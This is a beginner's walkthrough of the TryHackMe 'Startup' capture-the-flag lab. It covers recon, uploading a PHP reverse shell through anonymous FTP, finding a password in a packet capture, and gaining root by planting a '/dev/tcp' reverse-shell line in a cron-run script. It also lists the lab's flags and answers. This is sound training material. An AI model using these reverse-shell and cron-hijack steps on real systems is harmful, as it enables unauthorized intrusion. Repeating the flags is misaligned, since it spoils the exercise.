Hello guys, today I’m gonna solve with you a lab from tryhackme called Startup. This is an easy ctf, so if you are a begginer or mid level pententer, this is perfect for you to pratice your skills.
You need to know the basics of Web exploitation
1 — Starting the lab
First of all, you need to create an account in tryhackme, and start you machine.
As you can see, to complete the lab we need to solve all this question and get root privileges on the machine.
You need to conect to tryhacke with openvpn or the AttackBox. In this lab I’m gonna use openvpn.
2 — Recon
When I got the machine IP, i use a simple Syn scan with nmap to show all the open doors.
sudo nmap -sS {machine_ip}
The port 80 are open, which means it’s a web application.
There’s nothing interesting on the website, so I ran FeroxBuster to see the application paths. You can go with Gobuster as well.
feroxbuster -u http://{machine_ip}/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
Theres a path named /files.
3 — Exploitation
Exploring the path, I found this note. Could be interesting.
Now we know that some people can upload files for the website. But how? We got an open ftp port, let’s starts from there.
We can acces as an anonymous user, with blank password!
I’ll try upload a php reverse shell and see what will happen. (you need to set your Ip address and some port on the revshell)
I cannot upload files on root folder, so I’ll move to the ftp folder.
cd ftp
put revshell.php
It works. So, set a listener with the port you chose
nc -lvnp 1337
go to the /files and click on the file that you just upload.
We did it.
With ls command I found recipe.txt, so the first question must be in that file.
The first ingredient is:
Answer 1 — Love
What is the content at the user.txt?
I cannot access lennie’s user, so I’ll try to figure out his password.
Searching arround the folders we will find an incident folder. Maybe there’s a log of a leaked password?
No, just a dump file from wireshark. Maybe this is the way.
We can copy or move this file to the ftp folder and download it.
mv suspicious.pcapng /var/www/html/files/ftp
It worked! So we just have to download it.
get suspicious.pcapng
Open the file with the wireshark and search for something different for us.
The first thing that is strange was the packet 34.
Someone try to upload a shell.php, we can deduce that is someone else, because our file is named revshell.php.
We can confirm it analysing other packets.
On the packet 152 someone try to access the lennie’s user but got permission denied.
Searching a little more we can find some sudo -l, and su www-data commands, but in the packet 177 we find this:
It looks like lennie’s password.
4 — Privilege Escalation
With nmap we knew that is an ssh port open, lets try to connect with that.
ssh lennie@{machine_ip}
It work!
With lennies user, we can get our firt flag
Answer 2 — THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Now we gonna have to acces root user. But how?
We can upload linpeas.sh to show all the scripts that runs as root. But is a simple machine, so we can find by ourselves.
We have two scripts. /scripts/planner.sh and /etc/print.sh
I used:
cat print.sh
but theres only an echo command on the terminal
But, if you look the permissions, the planner.sh belongs to root but, the print.sh belong to us. You can see the problem here?
The script owned by root calls a script that is run by our user. Then whenever root runs his script, we can run ours with all his permissions. In this case, the only thing we have to do now is to edit our script, putting a reverse shell.
bash -i >& /dev/tcp/{YOUR_IP}/{PORT} 0>&1
I’ve used port 1337
After modify the script, you’ll need to wait a minute, because the planner.sh is a cron job who calls print.sh.
After a minute:
Now we are Root!
We just need to cat the last flag.
cat root.txt
Answer 3 — THM{f963aaa6a430f210222158ae15c3d76d}
We did it!
I hope you enjoyed the walktrhogh and that you learned something along the way. See you at the next one!
Happy Hacking! :)
